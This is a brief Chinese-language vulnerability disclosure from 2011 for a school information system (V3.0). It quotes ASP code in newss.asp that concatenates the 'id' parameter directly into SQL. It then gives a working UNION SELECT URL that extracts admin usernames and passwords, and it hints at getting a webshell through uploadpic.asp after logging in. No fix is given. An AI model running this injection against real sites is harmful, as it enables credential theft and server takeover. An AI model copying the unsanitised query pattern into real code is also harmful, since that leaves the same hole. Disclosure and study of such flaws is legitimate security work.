深圳信息职业技术学院 V3.0 注射漏洞

发布日期：2011-01.３０
发布作者：xiaokis

影响版本：V3.0

 

漏洞类型：SQL注入
漏洞描述：
文件：newss.asp

 <%     on error resume next     sql="update news set hits=hits+1 where id="&cstr(request("id"))     conn.execute sql      set rs=server.createobject("adodb.recordset")    sql="select * from news where id="&request("id")    rs.open sql,conn,1,1     if rs.eof and rs.bof then     response.write "<script>alert('对不起，该信息并不存在，请返回！');window.close();</Script>"     response.end     else      %>    

漏洞证实：http://127.0.0.1/news/gb/newss.asp?id=105%20union%20select%201,2,3,username,5,password,7,8,9,10,11,12,13,14%20from%20admin

此系统还存在多处注入！

 

进入后台后 有个uploadpic.asp 是雷池的拿SHELL方法 （未测试）

 

 

标签分类： 注入漏洞 SQL注入